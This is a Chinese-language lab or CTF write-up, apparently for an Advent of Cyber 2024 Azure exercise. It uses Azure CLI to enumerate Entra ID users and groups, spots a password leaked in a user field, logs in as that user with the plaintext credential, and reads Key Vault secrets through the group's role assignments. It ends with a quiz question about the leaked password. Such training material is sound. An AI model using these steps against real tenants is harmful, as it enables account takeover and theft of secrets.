Azure
Azure是一家云服务提供商(CSP),其以高度可扩展的方式提供计算资源,即可以让Azure管理底层基础设施,需求增加时扩展,流量恢复后减少
其也提供许多云服务,从身份管理到数据提取等
AzureCLI
其语法大致为:
az GROUP SUBGROUP ACTION OPTIONAL_PARAMETERS所有ad域用户
1
az ad user list
以
wvusr-开头的用户:1
az ad user list --filter "startsWith('wvusr-', displayName)"
找到一个特殊的用户,他的一个字段值与其他的有所差异,大致是其密码
那么攻击者有可能通过该用户来进入ad域
组
1
az ad group list
详细信息:
1
az ad group member list --group "Secret Recovery Group"
发现和刚刚的账户吻合
那么移动到那个账户来看看:
1
2az account clear
az login -u wvusr-backupware@aoc2024.onmicrosoft.com -p R3c0v3r_s3cr3ts!Azure角色分配
查看
secret recovery group组的信息:1
az role assignment list --assignee 1db95432-0c46-45b8-b126-b633ae67e06c --all
可以看到该组被分配两个角色:
Key Vault Reader和Key Vault Secrets User此角色分别能读取密钥保管库及其证书、密钥和机密的元数据,以及读取机密内容
通过
1
az keyvault list
查看该用户能否访问到敏感数据,发现密钥保管库
warevillesecrets在看下机密是否存储在这个库中,以及具体内容
1
2az keyvault secret list --vault-name warevillesecrets
az keyvault secret show --vault-name warevillesecrets --name aoc2024
1 | What is the password for backupware that was leaked? |